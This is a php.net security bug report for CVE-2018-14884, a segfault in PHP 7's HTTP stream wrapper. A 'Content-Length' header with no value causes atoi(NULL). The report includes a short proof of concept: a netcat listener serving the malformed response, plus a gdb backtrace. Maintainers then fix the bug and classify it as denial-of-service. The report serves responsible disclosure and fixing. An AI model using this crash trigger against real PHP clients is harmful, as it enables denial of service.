php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #75535 Inappropriately parsing HTTP response leads to PHP segment fault!
Submitted: 2017-11-17 04:35 UTC Modified: 2018-08-03 23:26 UTC
From: orange at chroot dot org Assigned: nikic (profile)
Status: Closed Package: HTTP related
PHP Version: 7.2Git-2017-11-17 (Git) OS: Ubuntu 17.04
Private report: No CVE-ID: 2018-14884
 [2017-11-17 04:35 UTC] orange at chroot dot org
Description:
------------
I fuzzed the HTTP parsing function in the latest version of PHP and found a segment fault. It is very easy to trigger this segment fault and may be vulnerable in some scenarios.

In `ext/standard/http_fopen_wrapper.c#L801`

`http_header_value` can be a NULL value. so the `atoi(NULL)` will lead to segment fault!

https://github.com/php/php-src/blob/9fbb019848cbb0387cb7267489dd91ebb4d9050e/ext/standard/http_fopen_wrapper.c#L801

Test script:
---------------
# cat poc
HTTP/1.1 200 OK
Content-Length

# nc -vvlp 80 < poc &
# php -r 'file_get_contents("http://localhost/");'
Segmentation fault



gdb-peda$ bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=0xa, group=<optimized out>, loc=0x7ffff72f0400 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00005555558f284b in atoi (__nptr=0x0) at /usr/include/stdlib.h:241
#2  php_stream_url_wrap_http_ex (wrapper=0x55555633f6e0 <php_stream_http_wrapper>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>, redirect_max=<optimized out>,
    flags=<optimized out>, response_header=<optimized out>) at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:801
#3  0x00005555558f3a7d in php_stream_url_wrap_http (wrapper=<optimized out>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>)
    at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:978
#4  0x000055555592baf9 in _php_stream_open_wrapper_ex (path=0x7ffff42632b8 "http://localhost", mode=0x55555602b563 "rb",
    options=<optimized out>, opened_path=0x0, context=0x7ffff42014c0) at /home/orange/php-src-master/main/streams/streams.c:2025
#5  0x00005555558a6129 in zif_file_get_contents (execute_data=<optimized out>, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/standard/file.c:550
#6  0x000055555581965c in phar_file_get_contents (execute_data=0x7ffff421b090, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/phar/func_interceptors.c:224
#7  0x0000555555a2209c in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/orange/php-src-master/Zend/zend_vm_execute.h:573
#8  execute_ex (ex=0x0) at /home/orange/php-src-master/Zend/zend_vm_execute.h:60062
#9  0x0000555555a27345 in zend_execute (op_array=0x7ffff427b2a0, return_value=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_vm_execute.h:64091
#10 0x0000555555968426 in zend_eval_stringl (str=0x555556389d50 "file_get_contents(\"http://localhost\");",
    str_len=<optimized out>, retval_ptr=0x0, string_name=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_execute_API.c:1054
#11 0x00005555559684f9 in zend_eval_stringl_ex (str=<optimized out>, str_len=<optimized out>, retval_ptr=<optimized out>,
    string_name=<optimized out>, handle_exceptions=0x1) at /home/orange/php-src-master/Zend/zend_execute_API.c:1095
#12 0x0000555555a2945a in do_cli (argc=0x3, argv=0x555556389cc0) at /home/orange/php-src-master/sapi/cli/php_cli.c:1042
#13 0x00005555556556c2 in main ()
#14 0x00007ffff6f4e3f1 in __libc_start_main (main=0x555555655250 <main>, argc=0x3, argv=0x7fffffffdfe8, init=<optimized out>,
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) at ../csu/libc-start.c:291
#15 0x00005555556557da in _start ()



Actual result:
--------------
Segment fault

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-11-18 11:34 UTC] nikic@php.net
-Status: Open +Status: Closed -Type: Bug +Type: Security -Assigned To: +Assigned To: nikic
 [2017-11-18 11:34 UTC] nikic@php.net
Fixed by https://github.com/php/php-src/commit/0e097f2c96ce31b16fa371981045f224e5a37160.

The issue also exists in PHP 7.0 and 7.1, so I'm adding a security classification. Given control of the remote endpoint accessed by PHP, this provides a denial-of-service vector. As this is a null pointer dereference, it does not appear to be exploitable beyond DOS.
 [2017-11-20 08:14 UTC] stas@php.net
If it's security-related, should be in 5.6 as well?
 [2017-11-20 10:08 UTC] nikic@php.net
@stas: The issue has been introduced in https://github.com/php/php-src/commit/5146d9f8ac170d8ba7109370d732d56dc0777578, which landed in PHP 7.0.16, PHP 7.1.2 and PHP 7.2-dev. It does not affect PHP 5.6.
 [2018-05-03 00:48 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2018-08-03 23:26 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2018-14884
 
PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Sun Sep 23 06:01:25 2018 UTC